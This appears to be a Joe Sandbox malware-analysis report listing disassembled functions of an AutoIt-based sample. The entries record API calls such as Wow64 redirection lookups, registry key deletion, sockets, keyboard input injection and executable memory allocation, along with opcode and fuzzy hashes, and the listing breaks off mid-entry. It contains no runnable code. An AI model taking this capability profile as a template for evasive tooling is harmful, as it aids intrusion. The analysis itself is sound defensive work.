                                                        • Instruction Fuzzy Hash: 95E08671547304EDDB13BBA4690376826985B01721F21926BF1459A0D9CEB40800C517
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00344B83,?), ref: 00344C44
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00344C56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-1355242751
                                                        • Opcode ID: d6e5a52a7c2b38feba3214bacc8c4f9021145bc916e71412323b31a6471ac360
                                                        • Instruction ID: c366d67e9c1ad5b4f48966bafa431a79e471356afeb7212800ff1455eab984e5
                                                        • Opcode Fuzzy Hash: d6e5a52a7c2b38feba3214bacc8c4f9021145bc916e71412323b31a6471ac360
                                                        • Instruction Fuzzy Hash: EAD0E230510722DFD7229B32D948A5AB6EAAF05351B1A883AD596DA160E670E8808B50
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00344BD0,?,00344DEF,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344C11
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00344C23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-3689287502
                                                        • Opcode ID: 9202f615afad7dfb7f2c7c9f7dc95ae802f88eaf023d449b6d9ab43a951d72bd
                                                        • Instruction ID: baf1ac128cbb0084d32918a0b95c088336dfc4086ba46cd5c2da2b17be4426ad
                                                        • Opcode Fuzzy Hash: 9202f615afad7dfb7f2c7c9f7dc95ae802f88eaf023d449b6d9ab43a951d72bd
                                                        • Instruction Fuzzy Hash: D8D0EC34911712DFD7226B71D948A46BADAAF09351B198839D486D6160E6B0E8808750
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,003C1039), ref: 003C0DF5
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003C0E07
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: 17c35c8ba652bbb0af646e260ad60b891578c352411e5e835e7f01e78ed131a9
                                                        • Instruction ID: 40f495ecd5d21040abad901119ac65c64be28ca89447db23a6385dd672346867
                                                        • Opcode Fuzzy Hash: 17c35c8ba652bbb0af646e260ad60b891578c352411e5e835e7f01e78ed131a9
                                                        • Instruction Fuzzy Hash: 5CD0C730440B26CFC3268F70C808B82B2EAAF01342F068C3ED58AC6250E6B1E890CB00
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,003B8CF4,?,003CF910), ref: 003B90EE
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003B9100
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                        • API String ID: 2574300362-199464113
                                                        • Opcode ID: 6799de1106aea00e9e19fe94fa8b16739dd3075cdf548d551b767e7e5d310747
                                                        • Instruction ID: 9a092e3a97e4c8b0be1cba5716677261c30fb965694bb10ee90a7f34c5868038
                                                        • Opcode Fuzzy Hash: 6799de1106aea00e9e19fe94fa8b16739dd3075cdf548d551b767e7e5d310747
                                                        • Instruction Fuzzy Hash: 1ED01235510713CFD7229F35D818A8676D9AF05355F17C83ED686D6550E770D880C750
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: LocalTime__swprintf
                                                        • String ID: %.3d$WIN_XPe
                                                        • API String ID: 2070861257-2409531811
                                                        • Opcode ID: d8141a40faa0de706e71d1a1e70f6ced8a90cb58832fc75a970d33ef97e21c02
                                                        • Instruction ID: 56aa02e0484d2eef09490d1fbe076b753bb7f9fbc7a16a83824bba9f7eed09cf
                                                        • Opcode Fuzzy Hash: d8141a40faa0de706e71d1a1e70f6ced8a90cb58832fc75a970d33ef97e21c02
                                                        • Instruction Fuzzy Hash: 58D05B7280530DFAC703B790DC88DF9737CA708301F1408A6F506D2450E2359755E721
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 79dcbc3c6dd72c7ab63ad74daa02b6b7cc95124651c2466eaf38570a327cf966
                                                        • Instruction ID: f5608ae0a8132cbba4c3b146b08cb743de800313a5e1083e94e262625f31bd04
                                                        • Opcode Fuzzy Hash: 79dcbc3c6dd72c7ab63ad74daa02b6b7cc95124651c2466eaf38570a327cf966
                                                        • Instruction Fuzzy Hash: 5CC18F74A14216EFCF15CFA5C884EAEBBB9FF48704B158598E805EB291D730ED81DB90
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 003BE0BE
                                                        • CharLowerBuffW.USER32(?,?), ref: 003BE101
                                                          • Part of subcall function 003BD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003BD7C5
                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 003BE301
                                                        • _memmove.LIBCMT ref: 003BE314
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                        • String ID:
                                                        • API String ID: 3659485706-0
                                                        • Opcode ID: f1bea6ede84f8376d9eaf8452d0f86f9766c32bb34f955fb5a32549345a90d65
                                                        • Instruction ID: 28037a5debc48757bfd3caabb34ab3677c0c1caf8d8a7f5490259d0a735892c6
                                                        • Opcode Fuzzy Hash: f1bea6ede84f8376d9eaf8452d0f86f9766c32bb34f955fb5a32549345a90d65
                                                        • Instruction Fuzzy Hash: 18C18A756043018FC706DF28C480AAABBE4FF89718F14896EF999DB751D731E946CB81
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 003B80C3
                                                        • CoUninitialize.OLE32 ref: 003B80CE
                                                          • Part of subcall function 0039D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0039D5D4
                                                        • VariantInit.OLEAUT32(?), ref: 003B80D9
                                                        • VariantClear.OLEAUT32(?), ref: 003B83AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        • Opcode ID: acde482ca13e1dcc395110491264a94c3dfa54a904557d0234260ab758d68969
                                                        • Instruction ID: 7242b5c63156a5ced368d34e3ef9314b0c4ae2419f8548ddb1c8a3b16d7b30c6
                                                        • Opcode Fuzzy Hash: acde482ca13e1dcc395110491264a94c3dfa54a904557d0234260ab758d68969
                                                        • Instruction Fuzzy Hash: B4A114796047019FCB12DF18C481B6AB7E8BF89758F044859FA9A9B7A1CB30FD05CB42
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: defbc2685e61ba9e04807391944c00d20ce75b21f769f051cf7ce350df18e6dc
                                                        • Instruction ID: 24dd4f2827c7bbea7b8a95806fa4a0c5a432223b06d5bfeccbc660fb00c2e124
                                                        • Opcode Fuzzy Hash: defbc2685e61ba9e04807391944c00d20ce75b21f769f051cf7ce350df18e6dc
                                                        • Instruction Fuzzy Hash: 1B519FB46053429EDF26AF65D893A2EB3E9AF45310F20D81FE596DF691DB70DC408701
                                                        APIs
                                                        • GetWindowRect.USER32(00C4E9B8,?), ref: 003C9863
                                                        • ScreenToClient.USER32(00000002,00000002), ref: 003C9896
                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 003C9903
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID:
                                                        • API String ID: 3880355969-0
                                                        • Opcode ID: 23e21837df05d16f4f54a16cadc8685f1f84f4ee7e062d62d3f4071ecc8e74ae
                                                        • Instruction ID: d1ff54d14d87b40e3bcbafc4b6a1be5622d64f998fcda07d35be112822aa8590
                                                        • Opcode Fuzzy Hash: 23e21837df05d16f4f54a16cadc8685f1f84f4ee7e062d62d3f4071ecc8e74ae
                                                        • Instruction Fuzzy Hash: 90513C35A00208AFDF11DF14C988FAE7BB6EB45360F12816EF855EB2A0D731AD51CB90
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00399AD2
                                                        • __itow.LIBCMT ref: 00399B03
                                                          • Part of subcall function 00399D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00399DBE
                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00399B6C
                                                        • __itow.LIBCMT ref: 00399BC3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID:
                                                        • API String ID: 3379773720-0
                                                        • Opcode ID: b52bd9cf0c062f2f563e662bfc3b819a9893dd7a698a0f71633ec1c26e660cdf
                                                        • Instruction ID: 712ee08d2a45e1e9a8bf36ad046105ea34807776624b4e73d52a27043ce5031c
                                                        • Opcode Fuzzy Hash: b52bd9cf0c062f2f563e662bfc3b819a9893dd7a698a0f71633ec1c26e660cdf
                                                        • Instruction Fuzzy Hash: 1C414275A00209ABDF16DF58D845BEE7BF9EF44710F00005AF905AB291DB74AD44CBA1
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 003B69D1
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003B69E1
                                                          • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                          • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003B6A45
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003B6A51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                        • String ID:
                                                        • API String ID: 2214342067-0
                                                        • Opcode ID: b31d73defebea35515a6ed3ec4449a466a705f8a9b6e88a728db87cd7fdda166
                                                        • Instruction ID: bef1fdbfefc541ee550e1303bab2e74d0bc79f6c9943ad00b7266fae182ecc02
                                                        • Opcode Fuzzy Hash: b31d73defebea35515a6ed3ec4449a466a705f8a9b6e88a728db87cd7fdda166
                                                        • Instruction Fuzzy Hash: CC4181757402006FEB62AF28CC87F6A77E99F05B14F048419FA59AF2D3DA75AD008791
                                                        APIs
                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003CF910), ref: 003B64A7
                                                        • _strlen.LIBCMT ref: 003B64D9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _strlen
                                                        • String ID:
                                                        • API String ID: 4218353326-0
                                                        • Opcode ID: 4f5a9325ccc39f5321c3bfd4aa28c28d122631ebe82350ab3ed5516d09d2956c
                                                        • Instruction ID: 61291daa4f25d835a6803420a49ed5abdc7d832a692dfa95ab2f2d4c8f5c5a8f
                                                        • Opcode Fuzzy Hash: 4f5a9325ccc39f5321c3bfd4aa28c28d122631ebe82350ab3ed5516d09d2956c
                                                        • Instruction Fuzzy Hash: F541A231A00104ABCB26EBA4DC96FEEB7A9AF45314F108156F9159F693DB34AD10CB50
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003AB89E
                                                        • GetLastError.KERNEL32(?,00000000), ref: 003AB8C4
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003AB8E9
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003AB915
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: a39e4c7ec2f976bb8818e918a88bb4c1ab569fd1dc1a93b6e4a17948fe456eb4
                                                        • Instruction ID: 1e4103a8518df4550255ae826f7751b3aedd3528d3c37ea0dea5bc02fcbcf3e1
                                                        • Opcode Fuzzy Hash: a39e4c7ec2f976bb8818e918a88bb4c1ab569fd1dc1a93b6e4a17948fe456eb4
                                                        • Instruction Fuzzy Hash: 1C411D39600550DFCB22EF19C445A5ABBE5EF8A310F158099ED4A9F362CB35FD01CB91
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003C88DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: 9a201cc266573506ca78aba4ea3b086448ccbb94c0a286f432232aa09222f12d
                                                        • Instruction ID: 225eb077ce900852dcdaeb96ffb4104273c478331252c07e69c4a44269104222
                                                        • Opcode Fuzzy Hash: 9a201cc266573506ca78aba4ea3b086448ccbb94c0a286f432232aa09222f12d
                                                        • Instruction Fuzzy Hash: CE31D434600208AFEB229F58CC45FB977A9EB09310F55452AFA11E76A1CF71EF409B56
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 003CAB60
                                                        • GetWindowRect.USER32(?,?), ref: 003CABD6
                                                        • PtInRect.USER32(?,?,003CC014), ref: 003CABE6
                                                        • MessageBeep.USER32(00000000), ref: 003CAC57
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: 3dc8e1acb05f815682cb3c8c13833921bbc055a2a9b84df0f91011ab6c75d517
                                                        • Instruction ID: 0750e255a790f915995ac6ecd9c9ce0bb285925239b5614b11382e76a5f8bc6d
                                                        • Opcode Fuzzy Hash: 3dc8e1acb05f815682cb3c8c13833921bbc055a2a9b84df0f91011ab6c75d517
                                                        • Instruction Fuzzy Hash: E94149316009199FCB12EF58D884F69BBFAFB49318F19C1A9E815DB260D730AD41CB92
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003A0B27
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 003A0B43
                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003A0BA9
                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003A0BFB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: 67cf02a265650068b4baad37977fb12eb648e2479061cf662491ffd9b022b20e
                                                        • Instruction ID: c9bdd38f6f6f6eb581cab52928f7fd32c400f39b2d04f7c3ff13b86c5d028747
                                                        • Opcode Fuzzy Hash: 67cf02a265650068b4baad37977fb12eb648e2479061cf662491ffd9b022b20e
                                                        • Instruction Fuzzy Hash: D3313A30E40218AEFF3B8B258D09BFABBAAEB47318F04435AE591961D1C375D9409775
                                                        APIs
                                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 003A0C66
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 003A0C82
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 003A0CE1
                                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 003A0D33
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
